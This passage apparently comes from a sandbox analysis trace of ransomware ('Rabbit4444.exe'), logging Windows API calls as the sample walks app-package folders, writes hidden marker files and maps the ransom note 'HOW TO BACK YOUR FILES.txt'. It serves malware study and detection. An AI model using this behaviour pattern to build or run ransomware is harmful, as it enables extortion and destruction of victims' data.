hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0065.115] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.115] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.115] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.115] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.116] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.116] CloseHandle (hObject=0x2cc) returned 1 [0065.116] CloseHandle (hObject=0x2a0) returned 1 [0065.116] GetCurrentThreadId () returned 0xd98 [0065.116] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221c8 [0065.116] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState" [0065.116] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b508 | out: hHeap=0xe0000) returned 1 [0065.116] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221c0 | out: hHeap=0xe0000) returned 1 [0065.117] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState" [0065.117] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState\\" [0065.117] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0065.117] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.118] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.120] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.121] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.121] CloseHandle (hObject=0x2a0) returned 1 [0065.122] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState") returned 107 [0065.122] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.122] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0227974, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0065.122] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.122] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.122] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.122] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.122] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0227974, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.122] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.122] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.122] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.122] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.122] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.122] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0227974, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0227974, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0227974, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.122] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.122] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.122] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0227974, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0227974, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0227974, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.123] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0065.124] lstrcpyW (in: lpString1=0x130ec10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.124] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.124] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.124] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.124] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.125] CloseHandle (hObject=0x2cc) returned 1 [0065.125] CloseHandle (hObject=0x2a0) returned 1 [0065.125] GetCurrentThreadId () returned 0xd98 [0065.125] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0065.125] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState" [0065.125] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b7a8 | out: hHeap=0xe0000) returned 1 [0065.125] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0065.125] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState" [0065.125] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState\\" [0065.125] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0065.125] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.126] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.128] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.129] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.129] CloseHandle (hObject=0x2a0) returned 1 [0065.130] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState") returned 105 [0065.130] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.130] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf024dbec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0065.130] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.130] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.130] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.130] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.130] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf024dbec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.130] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.130] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.130] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.130] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.130] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.130] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf024dbec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf024dbec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf024dbec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.130] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.131] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.131] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf024dbec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf024dbec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf024dbec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.131] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0065.131] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.131] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.131] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.132] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.132] CloseHandle (hObject=0x2cc) returned 1 [0065.132] CloseHandle (hObject=0x2a0) returned 1 [0065.132] GetCurrentThreadId () returned 0xd98 [0065.132] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0065.132] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache" [0065.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bb28 | out: hHeap=0xe0000) returned 1 [0065.132] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0065.132] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache" [0065.132] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache\\" [0065.132] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0065.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.133] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.135] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.136] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.136] CloseHandle (hObject=0x2a0) returned 1 [0065.137] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache") returned 105 [0065.137] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.137] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf024dbec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0065.137] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.137] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.137] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.137] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.137] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf024dbec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.137] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.137] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.137] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.137] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.137] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.137] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf024dbec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf024dbec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf024dbec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.137] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.137] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.137] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf024dbec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf024dbec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf024dbec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.137] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0065.137] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.138] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.138] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.139] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.139] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.139] CloseHandle (hObject=0x2cc) returned 1 [0065.139] CloseHandle (hObject=0x2a0) returned 1 [0065.139] GetCurrentThreadId () returned 0xd98 [0065.139] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0065.139] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: 